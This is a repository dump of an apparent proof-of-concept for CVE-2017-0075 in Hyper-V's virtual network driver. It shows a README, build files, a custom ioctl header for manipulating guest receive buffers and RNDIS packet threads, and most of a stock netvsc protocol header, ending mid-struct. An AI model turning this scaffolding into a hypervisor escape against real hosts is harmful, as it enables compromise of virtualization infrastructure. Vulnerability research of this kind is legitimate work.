├── Demo.mp4 ├── README.md ├── ring0 └── hyperv │ ├── Kconfig │ ├── Makefile │ ├── hv_netvsc.ko │ ├── hv_netvsc.mod.c │ ├── hyper_v.h │ ├── hyperv_net.h │ ├── modules.order │ ├── netvsc.c │ ├── netvsc_drv.c │ └── rndis_filter.c ├── ring3 ├── hyper_v ├── hyper_v.c ├── hyper_v.h ├── hyper_v2 └── hyper_v2.c └── run.sh /Demo.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/4B5F5F4B/HyperV/b1fba46337217abc9280dbd374e3b4e7ee6ce17b/Demo.mp4 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HyperV 2 | Almost one year ago, I wrote a PoC for CVE-2017-0075 after had read Jordan Rabet's blackhat talk. But I've no time to make a working exploit:(. 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /ring0/hyperv/Kconfig: -------------------------------------------------------------------------------- 1 | config HYPERV_NET 2 | tristate "Microsoft Hyper-V virtual network driver" 3 | depends on HYPERV 4 | help 5 | Select this option to enable the Hyper-V virtual network driver. 6 | -------------------------------------------------------------------------------- /ring0/hyperv/Makefile: -------------------------------------------------------------------------------- 1 | obj-$(CONFIG_HYPERV_NET) += hv_netvsc.o 2 | 3 | hv_netvsc-y := netvsc_drv.o netvsc.o rndis_filter.o 4 | -------------------------------------------------------------------------------- /ring0/hyperv/hv_netvsc.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/4B5F5F4B/HyperV/b1fba46337217abc9280dbd374e3b4e7ee6ce17b/ring0/hyperv/hv_netvsc.ko -------------------------------------------------------------------------------- /ring0/hyperv/hv_netvsc.mod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | MODULE_INFO(vermagic, VERMAGIC_STRING); 6 | MODULE_INFO(name, KBUILD_MODNAME); 7 | 8 | __visible struct module __this_module 9 | __attribute__((section(".gnu.linkonce.this_module"))) = { 10 | .name = KBUILD_MODNAME, 11 | .init = init_module, 12 | #ifdef CONFIG_MODULE_UNLOAD 13 | .exit = cleanup_module, 14 | #endif 15 | .arch = MODULE_ARCH_INIT, 16 | }; 17 | 18 | static const char __module_depends[] 19 | __used 20 | __attribute__((section(".modinfo"))) = 21 | "depends=hv_vmbus"; 22 | 23 | MODULE_ALIAS("vmbus:635161f83edfc546913ff2d2f965ed0e"); 24 | 25 | MODULE_INFO(srcversion, "A6B5629D4E861F0508144F1"); 26 | -------------------------------------------------------------------------------- /ring0/hyperv/hyper_v.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | 4 | typedef struct _RECEIVE_BUFFER_INFO 5 | { 6 | u32 receive_buffer_size; 7 | u32 receive_buffer_gpadl_handle; 8 | void* receive_buffer; 9 | bool receive_buffer_tainted; 10 | } 11 | RECEIVE_BUFFER_INFO; 12 | 13 | #define HYPERV_IOCTL_MAGCI 0x4B 14 | #define HYPERV_IOCTL_INIT_RECV_BUF_SEND_BUFFER _IOR(HYPERV_IOCTL_MAGCI, 1, u32) 15 | #define HYPERV_IOCTL_INIT_RECV_BUF_ESTABLISH_GPADL _IOWR(HYPERV_IOCTL_MAGCI, 6, RECEIVE_BUFFER_INFO) 16 | #define HYPERV_IOCTL_DESTROY_RECV_BUF _IOR(HYPERV_IOCTL_MAGCI, 7, RECEIVE_BUFFER_INFO) 17 | #define HYPERV_IOCTL_CHECK_RECEIVE_BUFFER_TAINTED _IOWR(HYPERV_IOCTL_MAGCI, 8, RECEIVE_BUFFER_INFO) 18 | 19 | #define HYPERV_IOCTL_SEND_RNDIS_PKT_KEEPALIVE _IOR(HYPERV_IOCTL_MAGCI, 2, bool) 20 | #define HYPERV_IOCTL_SEND_RNDIS_PKT_QUERY _IO(HYPERV_IOCTL_MAGCI, 3) 21 | #define HYPERV_IOCTL_SEND_RNDIS_PKT_COMPLETE _IO(HYPERV_IOCTL_MAGCI, 5) 22 | #define HYPERV_IOCTL_BLOCK_RNDIS_PKT_THREAD _IOR(HYPERV_IOCTL_MAGCI, 4, bool) -------------------------------------------------------------------------------- /ring0/hyperv/hyperv_net.h: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright (c) 2011, Microsoft Corporation. 4 | * 5 | * This program is free software; you can redistribute it and/or modify it 6 | * under the terms and conditions of the GNU General Public License, 7 | * version 2, as published by the Free Software Foundation. 8 | * 9 | * This program is distributed in the hope it will be useful, but WITHOUT 10 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 11 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 12 | * more details. 13 | * 14 | * You should have received a copy of the GNU General Public License along with 15 | * this program; if not, see . 16 | * 17 | * Authors: 18 | * Haiyang Zhang 19 | * Hank Janssen 20 | * K. Y. Srinivasan 21 | * 22 | */ 23 | 24 | #ifndef _HYPERV_NET_H 25 | #define _HYPERV_NET_H 26 | 27 | #include 28 | #include 29 | #include 30 | 31 | /* RSS related */ 32 | #define OID_GEN_RECEIVE_SCALE_CAPABILITIES 0x00010203 /* query only */ 33 | #define OID_GEN_RECEIVE_SCALE_PARAMETERS 0x00010204 /* query and set */ 34 | 35 | #define NDIS_OBJECT_TYPE_RSS_CAPABILITIES 0x88 36 | #define NDIS_OBJECT_TYPE_RSS_PARAMETERS 0x89 37 | #define NDIS_OBJECT_TYPE_OFFLOAD 0xa7 38 | 39 | #define NDIS_RECEIVE_SCALE_CAPABILITIES_REVISION_2 2 40 | #define NDIS_RECEIVE_SCALE_PARAMETERS_REVISION_2 2 41 | 42 | struct ndis_obj_header { 43 | u8 type; 44 | u8 rev; 45 | u16 size; 46 | } __packed; 47 | 48 | /* ndis_recv_scale_cap/cap_flag */ 49 | #define NDIS_RSS_CAPS_MESSAGE_SIGNALED_INTERRUPTS 0x01000000 50 | #define NDIS_RSS_CAPS_CLASSIFICATION_AT_ISR 0x02000000 51 | #define NDIS_RSS_CAPS_CLASSIFICATION_AT_DPC 0x04000000 52 | #define NDIS_RSS_CAPS_USING_MSI_X 0x08000000 53 | #define NDIS_RSS_CAPS_RSS_AVAILABLE_ON_PORTS 0x10000000 54 | #define NDIS_RSS_CAPS_SUPPORTS_MSI_X 0x20000000 55 | #define NDIS_RSS_CAPS_HASH_TYPE_TCP_IPV4 0x00000100 56 | #define NDIS_RSS_CAPS_HASH_TYPE_TCP_IPV6 0x00000200 57 | #define NDIS_RSS_CAPS_HASH_TYPE_TCP_IPV6_EX 0x00000400 58 | 59 | struct ndis_recv_scale_cap { /* NDIS_RECEIVE_SCALE_CAPABILITIES */ 60 | struct ndis_obj_header hdr; 61 | u32 cap_flag; 62 | u32 num_int_msg; 63 | u32 num_recv_que; 64 | u16 num_indirect_tabent; 65 | } __packed; 66 | 67 | 68 | /* ndis_recv_scale_param flags */ 69 | #define NDIS_RSS_PARAM_FLAG_BASE_CPU_UNCHANGED 0x0001 70 | #define NDIS_RSS_PARAM_FLAG_HASH_INFO_UNCHANGED 0x0002 71 | #define NDIS_RSS_PARAM_FLAG_ITABLE_UNCHANGED 0x0004 72 | #define NDIS_RSS_PARAM_FLAG_HASH_KEY_UNCHANGED 0x0008 73 | #define NDIS_RSS_PARAM_FLAG_DISABLE_RSS 0x0010 74 | 75 | /* Hash info bits */ 76 | #define NDIS_HASH_FUNC_TOEPLITZ 0x00000001 77 | #define NDIS_HASH_IPV4 0x00000100 78 | #define NDIS_HASH_TCP_IPV4 0x00000200 79 | #define NDIS_HASH_IPV6 0x00000400 80 | #define NDIS_HASH_IPV6_EX 0x00000800 81 | #define NDIS_HASH_TCP_IPV6 0x00001000 82 | #define NDIS_HASH_TCP_IPV6_EX 0x00002000 83 | 84 | #define NDIS_RSS_INDIRECTION_TABLE_MAX_SIZE_REVISION_2 (128 * 4) 85 | #define NDIS_RSS_HASH_SECRET_KEY_MAX_SIZE_REVISION_2 40 86 | 87 | #define ITAB_NUM 128 88 | 89 | struct ndis_recv_scale_param { /* NDIS_RECEIVE_SCALE_PARAMETERS */ 90 | struct ndis_obj_header hdr; 91 | 92 | /* Qualifies the rest of the information */ 93 | u16 flag; 94 | 95 | /* The base CPU number to do receive processing. not used */ 96 | u16 base_cpu_number; 97 | 98 | /* This describes the hash function and type being enabled */ 99 | u32 hashinfo; 100 | 101 | /* The size of indirection table array */ 102 | u16 indirect_tabsize; 103 | 104 | /* The offset of the indirection table from the beginning of this 105 | * structure 106 | */ 107 | u32 indirect_taboffset; 108 | 109 | /* The size of the hash secret key */ 110 | u16 hashkey_size; 111 | 112 | /* The offset of the secret key from the beginning of this structure */ 113 | u32 kashkey_offset; 114 | 115 | u32 processor_masks_offset; 116 | u32 num_processor_masks; 117 | u32 processor_masks_entry_size; 118 | }; 119 | 120 | /* Fwd declaration */ 121 | struct ndis_tcp_ip_checksum_info; 122 | struct ndis_pkt_8021q_info; 123 | 124 | /* 125 | * Represent netvsc packet which contains 1 RNDIS and 1 ethernet frame 126 | * within the RNDIS 127 | * 128 | * The size of this structure is less than 48 bytes and we can now 129 | * place this structure in the skb->cb field. 130 | */ 131 | struct hv_netvsc_packet { 132 | /* Bookkeeping stuff */ 133 | u8 cp_partial; /* partial copy into send buffer */ 134 | 135 | u8 rmsg_size; /* RNDIS header and PPI size */ 136 | u8 rmsg_pgcnt; /* page count of RNDIS header and PPI */ 137 | u8 page_buf_cnt; 138 | 139 | u16 q_idx; 140 | u16 total_packets; 141 | 142 | u32 total_bytes; 143 | u32 send_buf_index; 144 | u32 total_data_buflen; 145 | }; 146 | 147 | struct netvsc_device_info { 148 | unsigned char mac_adr[ETH_ALEN]; 149 | int ring_size; 150 | u32 num_chn; 151 | u32 send_sections; 152 | u32 recv_sections; 153 | u32 send_section_size; 154 | u32 recv_section_size; 155 | }; 156 | 157 | enum rndis_device_state { 158 | RNDIS_DEV_UNINITIALIZED = 0, 159 | RNDIS_DEV_INITIALIZING, 160 | RNDIS_DEV_INITIALIZED, 161 | RNDIS_DEV_DATAINITIALIZED, 162 | }; 163 | 164 | #define NETVSC_HASH_KEYLEN 40 165 | 166 | struct rndis_device { 167 | struct net_device *ndev; 168 | 169 | enum rndis_device_state state; 170 | 171 | atomic_t new_req_id; 172 | 173 | spinlock_t request_lock; 174 | struct list_head req_list; 175 | 176 | struct work_struct mcast_work; 177 | 178 | bool link_state; /* 0 - link up, 1 - link down */ 179 | 180 | u8 hw_mac_adr[ETH_ALEN]; 181 | u8 rss_key[NETVSC_HASH_KEYLEN]; 182 | u16 ind_table[ITAB_NUM]; 183 | }; 184 | 185 | 186 | /* Interface */ 187 | struct rndis_message; 188 | struct netvsc_device; 189 | struct net_device_context; 190 | 191 | struct netvsc_device *netvsc_device_add(struct hv_device *device, 192 | const struct netvsc_device_info *info); 193 | int netvsc_alloc_recv_comp_ring(struct netvsc_device *net_device, u32 q_idx); 194 | void netvsc_device_remove(struct hv_device *device); 195 | int netvsc_send(struct net_device_context *ndc, 196 | struct hv_netvsc_packet *packet, 197 | struct rndis_message *rndis_msg, 198 | struct hv_page_buffer *page_buffer, 199 | struct sk_buff *skb); 200 | void netvsc_linkstatus_callback(struct hv_device *device_obj, 201 | struct rndis_message *resp); 202 | int netvsc_recv_callback(struct net_device *net, 203 | struct vmbus_channel *channel, 204 | void *data, u32 len, 205 | const struct ndis_tcp_ip_checksum_info *csum_info, 206 | const struct ndis_pkt_8021q_info *vlan); 207 | void netvsc_channel_cb(void *context); 208 | int netvsc_poll(struct napi_struct *napi, int budget); 209 | 210 | void rndis_set_subchannel(struct work_struct *w); 211 | bool rndis_filter_opened(const struct netvsc_device *nvdev); 212 | int rndis_filter_open(struct netvsc_device *nvdev); 213 | int rndis_filter_close(struct netvsc_device *nvdev); 214 | struct netvsc_device *rndis_filter_device_add(struct hv_device *dev, 215 | struct netvsc_device_info *info); 216 | void rndis_filter_update(struct netvsc_device *nvdev); 217 | void rndis_filter_device_remove(struct hv_device *dev, 218 | struct netvsc_device *nvdev); 219 | int rndis_filter_set_rss_param(struct rndis_device *rdev, 220 | const u8 *key); 221 | int rndis_filter_receive(struct net_device *ndev, 222 | struct netvsc_device *net_dev, 223 | struct hv_device *dev, 224 | struct vmbus_channel *channel, 225 | void *data, u32 buflen); 226 | 227 | int rndis_filter_set_device_mac(struct netvsc_device *ndev, 228 | const char *mac); 229 | 230 | struct rndis_request *get_rndis_request(struct rndis_device *dev, 231 | u32 msg_type, 232 | u32 msg_len); 233 | 234 | int rndis_filter_send_request(struct rndis_device *dev, 235 | struct rndis_request *req); 236 | 237 | int rndis_filter_query_device_mac(struct rndis_device *dev, 238 | struct netvsc_device *net_device); 239 | 240 | void netvsc_switch_datapath(struct net_device *nv_dev, bool vf); 241 | 242 | #define NVSP_INVALID_PROTOCOL_VERSION ((u32)0xFFFFFFFF) 243 | 244 | #define NVSP_PROTOCOL_VERSION_1 2 245 | #define NVSP_PROTOCOL_VERSION_2 0x30002 246 | #define NVSP_PROTOCOL_VERSION_4 0x40000 247 | #define NVSP_PROTOCOL_VERSION_5 0x50000 248 | 249 | enum { 250 | NVSP_MSG_TYPE_NONE = 0, 251 | 252 | /* Init Messages */ 253 | NVSP_MSG_TYPE_INIT = 1, 254 | NVSP_MSG_TYPE_INIT_COMPLETE = 2, 255 | 256 | NVSP_VERSION_MSG_START = 100, 257 | 258 | /* Version 1 Messages */ 259 | NVSP_MSG1_TYPE_SEND_NDIS_VER = NVSP_VERSION_MSG_START, 260 | 261 | NVSP_MSG1_TYPE_SEND_RECV_BUF, 262 | NVSP_MSG1_TYPE_SEND_RECV_BUF_COMPLETE, 263 | NVSP_MSG1_TYPE_REVOKE_RECV_BUF, 264 | 265 | NVSP_MSG1_TYPE_SEND_SEND_BUF, 266 | NVSP_MSG1_TYPE_SEND_SEND_BUF_COMPLETE, 267 | NVSP_MSG1_TYPE_REVOKE_SEND_BUF, 268 | 269 | NVSP_MSG1_TYPE_SEND_RNDIS_PKT, 270 | NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE, 271 | 272 | /* Version 2 messages */ 273 | NVSP_MSG2_TYPE_SEND_CHIMNEY_DELEGATED_BUF, 274 | NVSP_MSG2_TYPE_SEND_CHIMNEY_DELEGATED_BUF_COMP, 275 | NVSP_MSG2_TYPE_REVOKE_CHIMNEY_DELEGATED_BUF, 276 | 277 | NVSP_MSG2_TYPE_RESUME_CHIMNEY_RX_INDICATION, 278 | 279 | NVSP_MSG2_TYPE_TERMINATE_CHIMNEY, 280 | NVSP_MSG2_TYPE_TERMINATE_CHIMNEY_COMP, 281 | 282 | NVSP_MSG2_TYPE_INDICATE_CHIMNEY_EVENT, 283 | 284 | NVSP_MSG2_TYPE_SEND_CHIMNEY_PKT, 285 | NVSP_MSG2_TYPE_SEND_CHIMNEY_PKT_COMP, 286 | 287 | NVSP_MSG2_TYPE_POST_CHIMNEY_RECV_REQ, 288 | NVSP_MSG2_TYPE_POST_CHIMNEY_RECV_REQ_COMP, 289 | 290 | NVSP_MSG2_TYPE_ALLOC_RXBUF, 291 | NVSP_MSG2_TYPE_ALLOC_RXBUF_COMP, 292 | 293 | NVSP_MSG2_TYPE_FREE_RXBUF, 294 | 295 | NVSP_MSG2_TYPE_SEND_VMQ_RNDIS_PKT, 296 | NVSP_MSG2_TYPE_SEND_VMQ_RNDIS_PKT_COMP, 297 | 298 | NVSP_MSG2_TYPE_SEND_NDIS_CONFIG, 299 | 300 | NVSP_MSG2_TYPE_ALLOC_CHIMNEY_HANDLE, 301 | NVSP_MSG2_TYPE_ALLOC_CHIMNEY_HANDLE_COMP, 302 | 303 | NVSP_MSG2_MAX = NVSP_MSG2_TYPE_ALLOC_CHIMNEY_HANDLE_COMP, 304 | 305 | /* Version 4 messages */ 306 | NVSP_MSG4_TYPE_SEND_VF_ASSOCIATION, 307 | NVSP_MSG4_TYPE_SWITCH_DATA_PATH, 308 | NVSP_MSG4_TYPE_UPLINK_CONNECT_STATE_DEPRECATED, 309 | 310 | NVSP_MSG4_MAX = NVSP_MSG4_TYPE_UPLINK_CONNECT_STATE_DEPRECATED, 311 | 312 | /* Version 5 messages */ 313 | NVSP_MSG5_TYPE_OID_QUERY_EX, 314 | NVSP_MSG5_TYPE_OID_QUERY_EX_COMP, 315 | NVSP_MSG5_TYPE_SUBCHANNEL, 316 | NVSP_MSG5_TYPE_SEND_INDIRECTION_TABLE, 317 | 318 | NVSP_MSG5_MAX = NVSP_MSG5_TYPE_SEND_INDIRECTION_TABLE, 319 | }; 320 | 321 | enum { 322 | NVSP_STAT_NONE = 0, 323 | NVSP_STAT_SUCCESS, 324 | NVSP_STAT_FAIL, 325 | NVSP_STAT_PROTOCOL_TOO_NEW, 326 | NVSP_STAT_PROTOCOL_TOO_OLD, 327 | NVSP_STAT_INVALID_RNDIS_PKT, 328 | NVSP_STAT_BUSY, 329 | NVSP_STAT_PROTOCOL_UNSUPPORTED, 330 | NVSP_STAT_MAX, 331 | }; 332 | 333 | struct nvsp_message_header { 334 | u32 msg_type; 335 | }; 336 | 337 | /* Init Messages */ 338 | 339 | /* 340 | * This message is used by the VSC to initialize the channel after the channels 341 | * has been opened. This message should never include anything other then 342 | * versioning (i.e. this message will be the same for ever). 343 | */ 344 | struct nvsp_message_init { 345 | u32 min_protocol_ver; 346 | u32 max_protocol_ver; 347 | } __packed; 348 | 349 | /* 350 | * This message is used by the VSP to complete the initialization of the 351 | * channel. This message should never include anything other then versioning 352 | * (i.e. this message will be the same for ever). 353 | */ 354 | struct nvsp_message_init_complete { 355 | u32 negotiated_protocol_ver; 356 | u32 max_mdl_chain_len; 357 | u32 status; 358 | } __packed; 359 | 360 | union nvsp_message_init_uber { 361 | struct nvsp_message_init init; 362 | struct nvsp_message_init_complete init_complete; 363 | } __packed; 364 | 365 | /* Version 1 Messages */ 366 | 367 | /* 368 | * This message is used by the VSC to send the NDIS version to the VSP. The VSP 369 | * can use this information when handling OIDs sent by the VSC. 370 | */ 371 | struct nvsp_1_message_send_ndis_version { 372 | u32 ndis_major_ver; 373 | u32 ndis_minor_ver; 374 | } __packed; 375 | 376 | /* 377 | * This message is used by the VSC to send a receive buffer to the VSP. The VSP 378 | * can then use the receive buffer to send data to the VSC. 379 | */ 380 | struct nvsp_1_message_send_receive_buffer { 381 | u32 gpadl_handle; 382 | u16 id; 383 | } __packed; 384 | 385 | struct nvsp_1_receive_buffer_section { 386 | u32 offset; 387 | u32 sub_alloc_size; 388 | u32 num_sub_allocs; 389 | u32 end_offset; 390 | } __packed; 391 | 392 | /* 393 | * This message is used by the VSP to acknowledge a receive buffer send by the 394 | * VSC. This message must be sent by the VSP before the VSP uses the receive 395 | * buffer. 396 | */ 397 | struct nvsp_1_message_send_receive_buffer_complete { 398 | u32 status; 399 | u32 num_sections; 400 | 401 | /* 402 | * The receive buffer is split into two parts, a large suballocation 403 | * section and a small suballocation section. These sections are then 404 | * suballocated by a certain size. 405 | */ 406 | 407 | /* 408 | * For example, the following break up of the receive buffer has 6 409 | * large suballocations and 10 small suballocations. 410 | */ 411 | 412 | /* 413 | * | Large Section | | Small Section | 414 | * ------------------------------------------------------------ 415 | * | | | | | | | | | | | | | | | | | | 416 | * | | 417 | * LargeOffset SmallOffset 418 | */ 419 | 420 | struct nvsp_1_receive_buffer_section sections[1]; 421 | } __packed; 422 | 423 | /* 424 | * This message is sent by the VSC to revoke the receive buffer. After the VSP 425 | * completes this transaction, the vsp should never use the receive buffer 426 | * again. 427 | */ 428 | struct nvsp_1_message_revoke_receive_buffer { 429 | u16 id; 430 | }; 431 | 432 | /* 433 | * This message is used by the VSC to send a send buffer to the VSP. The VSC 434 | * can then use the send buffer to send data to the VSP. 435 | */ 436 | struct nvsp_1_message_send_send_buffer { 437 | u32 gpadl_handle; 438 | u16 id; 439 | } __packed; 440 | 441 | /* 442 | * This message is used by the VSP to acknowledge a send buffer sent by the 443 | * VSC. This message must be sent by the VSP before the VSP uses the sent 444 | * buffer. 445 | */ 446 | struct nvsp_1_message_send_send_buffer_complete { 447 | u32 status; 448 | 449 | /* 450 | * The VSC gets to choose the size of the send buffer and the VSP gets 451 | * to choose the sections size of the buffer. This was done to enable 452 | * dynamic reconfigurations when the cost of GPA-direct buffers 453 | * decreases. 454 | */ 455 | u32 section_size; 456 | } __packed; 457 | 458 | /* 459 | * This message is sent by the VSC to revoke the send buffer. After the VSP 460 | * completes this transaction, the vsp should never use the send buffer again. 461 | */ 462 | struct nvsp_1_message_revoke_send_buffer { 463 | u16 id; 464 | }; 465 | 466 | /* 467 | * This message is used by both the VSP and the VSC to send a RNDIS message to 468 | * the opposite channel endpoint. 469 | */ 470 | struct nvsp_1_message_send_rndis_packet { 471 | /* 472 | * This field is specified by RNDIS. They assume there's two different 473 | * channels of communication. However, the Network VSP only has one. 474 | * Therefore, the channel travels with the RNDIS packet. 475 | */ 476 | u32 channel_type; 477 | 478 | /* 479 | * This field is used to send part or all of the data through a send 480 | * buffer. This values specifies an index into the send buffer. If the 481 | * index is 0xFFFFFFFF, then the send buffer is not being used and all 482 | * of the data was sent through other VMBus mechanisms. 483 | */ 484 | u32 send_buf_section_index; 485 | u32 send_buf_section_size; 486 | } __packed; 487 | 488 | /* 489 | * This message is used by both the VSP and the VSC to complete a RNDIS message 490 | * to the opposite channel endpoint. At this point, the initiator of this 491 | * message cannot use any resources associated with the original RNDIS packet. 492 | */ 493 | struct nvsp_1_message_send_rndis_packet_complete { 494 | u32 status; 495 | }; 496 | 497 | union nvsp_1_message_uber { 498 | struct nvsp_1_message_send_ndis_version send_ndis_ver; 499 | 500 | struct nvsp_1_message_send_receive_buffer send_recv_buf; 501 | struct nvsp_1_message_send_receive_buffer_complete 502 | send_recv_buf_complete; 503 | struct nvsp_1_message_revoke_receive_buffer revoke_recv_buf; 504 | 505 | struct nvsp_1_message_send_send_buffer send_send_buf; 506 | struct nvsp_1_message_send_send_buffer_complete send_send_buf_complete; 507 | struct nvsp_1_message_revoke_send_buffer revoke_send_buf; 508 | 509 | struct nvsp_1_message_send_rndis_packet send_rndis_pkt; 510 | struct nvsp_1_message_send_rndis_packet_complete 511 | send_rndis_pkt_complete; 512 | } __packed; 513 | 514 | 515 | /* 516 | * Network VSP protocol version 2 messages: 517 | */ 518 | struct nvsp_2_vsc_capability { 519 | union { 520 | u64 data; 521 | struct { 522 | u64 vmq:1; 523 | u64 chimney:1; 524 | u64 sriov:1; 525 | u64 ieee8021q:1; 526 | u64 correlation_id:1; 527 | u64 teaming:1; 528 | }; 529 | }; 530 | } __packed; 531 | 532 | struct nvsp_2_send_ndis_config { 533 | u32 mtu; 534 | u32 reserved; 535 | struct nvsp_2_vsc_capability capability; 536 | } __packed; 537 | 538 | /* Allocate receive buffer */ 539 | struct nvsp_2_alloc_rxbuf { 540 | /* Allocation ID to match the allocation request and response */ 541 | u32 alloc_id; 542 | 543 | /* Length of the VM shared memory receive buffer that needs to 544 | * be allocated 545 | */ 546 | u32 len; 547 | } __packed; 548 | 549 | /* Allocate receive buffer complete */ 550 | struct nvsp_2_alloc_rxbuf_comp { 551 | /* The NDIS_STATUS code for buffer allocation */ 552 | u32 status; 553 | 554 | u32 alloc_id; 555 | 556 | /* GPADL handle for the allocated receive buffer */ 557 | u32 gpadl_handle; 558 | 559 | /* Receive buffer ID */ 560 | u64 recv_buf_id; 561 | } __packed; 562 | 563 | struct nvsp_2_free_rxbuf { 564 | u64 recv_buf_id; 565 | } __packed; 566 | 567 | union nvsp_2_message_uber { 568 | struct nvsp_2_send_ndis_config send_ndis_config; 569 | struct nvsp_2_alloc_rxbuf alloc_rxbuf; 570 | struct nvsp_2_alloc_rxbuf_comp alloc_rxbuf_comp; 571 | struct nvsp_2_free_rxbuf free_rxbuf; 572 | } __packed; 573 | 574 | struct nvsp_4_send_vf_association { 575 | /* 1: allocated, serial number is valid. 0: not allocated */ 576 | u32 allocated; 577 | 578 | /* Serial number of the VF to team with */ 579 | u32 serial; 580 | } __packed; 581 | 582 | enum nvsp_vm_datapath { 583 | NVSP_DATAPATH_SYNTHETIC = 0, 584 | NVSP_DATAPATH_VF, 585 | NVSP_DATAPATH_MAX 586 | }; 587 | 588 | struct nvsp_4_sw_datapath { 589 | u32 active_datapath; /* active data path in VM */ 590 | } __packed; 591 | 592 | union nvsp_4_message_uber { 593 | struct nvsp_4_send_vf_association vf_assoc; 594 | struct nvsp_4_sw_datapath active_dp; 595 | } __packed; 596 | 597 | enum nvsp_subchannel_operation { 598 | NVSP_SUBCHANNEL_NONE = 0, 599 | NVSP_SUBCHANNEL_ALLOCATE, 600 | NVSP_SUBCHANNEL_MAX 601 | }; 602 | 603 | struct nvsp_5_subchannel_request { 604 | u32 op; 605 | u32 num_subchannels; 606 | } __packed; 607 | 608 | struct nvsp_5_subchannel_complete { 609 | u32 status; 610 | u32 num_subchannels; /* Actual number of subchannels allocated */ 611 | } __packed; 612 | 613 | struct nvsp_5_send_indirect_table { 614 | /* The number of entries in the send indirection table */ 615 | u32 count; 616 | 617 | /* The offset of the send indirection table from top of this struct. 618 | * The send indirection table tells which channel to put the send 619 | * traffic on. Each entry is a channel number. 620 | */ 621 | u32 offset; 622 | } __packed; 623 | 624 | union nvsp_5_message_uber { 625 | struct nvsp_5_subchannel_request subchn_req; 626 | struct nvsp_5_subchannel_complete subchn_comp; 627 | struct nvsp_5_send_indirect_table send_table; 628 | } __packed; 629 | 630 | union nvsp_all_messages { 631 | union nvsp_message_init_uber init_msg; 632 | union nvsp_1_message_uber v1_msg; 633 | union nvsp_2_message_uber v2_msg; 634 | union nvsp_4_message_uber v4_msg; 635 | union nvsp_5_message_uber v5_msg; 636 | } __packed; 637 | 638 | /* ALL Messages */ 639 | struct nvsp_message { 640 | struct nvsp_message_header hdr; 641 | union nvsp_all_messages msg; 642 | } __packed; 643 | 644 | 645 | #define NETVSC_MTU 65535 646 | #define NETVSC_MTU_MIN ETH_MIN_MTU 647 | 648 | #define NETVSC_RECEIVE_BUFFER_SIZE (1024*1024*16) /* 16MB */ 649 | #define NETVSC_RECEIVE_BUFFER_SIZE_LEGACY (1024*1024*15) /* 15MB */ 650 | #define NETVSC_SEND_BUFFER_SIZE (1024 * 1024 * 15) /* 15MB */ 651 | #define NETVSC_INVALID_INDEX -1 652 | 653 | #define NETVSC_SEND_SECTION_SIZE 6144 654 | #define NETVSC_RECV_SECTION_SIZE 1728 655 | 656 | #define NETVSC_RECEIVE_BUFFER_ID 0xcafe 657 | #define NETVSC_SEND_BUFFER_ID 0 658 | 659 | #define VRSS_SEND_TAB_SIZE 16 /* must be power of 2 */ 660 | #define VRSS_CHANNEL_MAX 64 661 | #define VRSS_CHANNEL_DEFAULT 8 662 | 663 | #define RNDIS_MAX_PKT_DEFAULT 8 664 | #define RNDIS_PKT_ALIGN_DEFAULT 8 665 | 666 | struct multi_send_data { 667 | struct sk_buff *skb; /* skb containing the pkt */ 668 | struct hv_netvsc_packet *pkt; /* netvsc pkt pending */ 669 | u32 count; /* counter of batched packets */ 670 | }; 671 | 672 | struct recv_comp_data { 673 | u64 tid; /* transaction id */ 674 | u32 status; 675 | }; 676 | 677 | struct multi_recv_comp { 678 | struct recv_comp_data *slots; 679 | u32 first; /* first data entry */ 680 | u32 next; /* next entry for writing */ 681 | }; 682 | 683 | struct netvsc_stats { 684 | u64 packets; 685 | u64 bytes; 686 | u64 broadcast; 687 | u64 multicast; 688 | struct u64_stats_sync syncp; 689 | }; 690 | 691 | struct netvsc_ethtool_stats { 692 | unsigned long tx_scattered; 693 | unsigned long tx_no_memory; 694 | unsigned long tx_no_space; 695 | unsigned long tx_too_big; 696 | unsigned long tx_busy; 697 | unsigned long tx_send_full; 698 | unsigned long rx_comp_busy; 699 | }; 700 | 701 | struct netvsc_vf_pcpu_stats { 702 | u64 rx_packets; 703 | u64 rx_bytes; 704 | u64 tx_packets; 705 | u64 tx_bytes; 706 | struct u64_stats_sync syncp; 707 | u32 tx_dropped; 708 | }; 709 | 710 | struct netvsc_reconfig { 711 | struct list_head list; 712 | u32 event; 713 | }; 714 | 715 | /* The context of the netvsc device */ 716 | struct net_device_context { 717 | /* point back to our device context */ 718 | struct hv_device *device_ctx; 719 | /* netvsc_device */ 720 | struct netvsc_device __rcu *nvdev; 721 | /* reconfigure work */ 722 | struct delayed_work dwork; 723 | /* last reconfig time */ 724 | unsigned long last_reconfig; 725 | /* reconfig events */ 726 | struct list_head reconfig_events; 727 | /* list protection */ 728 | spinlock_t lock; 729 | 730 | u32 msg_enable; /* debug level */ 731 | 732 | u32 tx_checksum_mask; 733 | 734 | u32 tx_send_table[VRSS_SEND_TAB_SIZE]; 735 | 736 | /* Ethtool settings */ 737 | bool udp4_l4_hash; 738 | bool udp6_l4_hash; 739 | u8 duplex; 740 | u32 speed; 741 | struct netvsc_ethtool_stats eth_stats; 742 | 743 | /* State to manage the associated VF interface. */ 744 | struct net_device __rcu *vf_netdev; 745 | struct netvsc_vf_pcpu_stats __percpu *vf_stats; 746 | struct delayed_work vf_takeover; 747 | 748 | /* 1: allocated, serial number is valid. 0: not allocated */ 749 | u32 vf_alloc; 750 | /* Serial number of the VF to team with */ 751 | u32 vf_serial; 752 | }; 753 | 754 | /* Per channel data */ 755 | struct netvsc_channel { 756 | struct vmbus_channel *channel; 757 | struct netvsc_device *net_device; 758 | const struct vmpacket_descriptor *desc; 759 | struct napi_struct napi; 760 | struct multi_send_data msd; 761 | struct multi_recv_comp mrc; 762 | atomic_t queue_sends; 763 | 764 | struct netvsc_stats tx_stats; 765 | struct netvsc_stats rx_stats; 766 | }; 767 | 768 | /* Per netvsc device */ 769 | struct netvsc_device { 770 | u32 nvsp_version; 771 | 772 | wait_queue_head_t wait_drain; 773 | bool destroy; 774 | 775 | /* Receive buffer allocated by us but manages by NetVSP */ 776 | void *recv_buf; 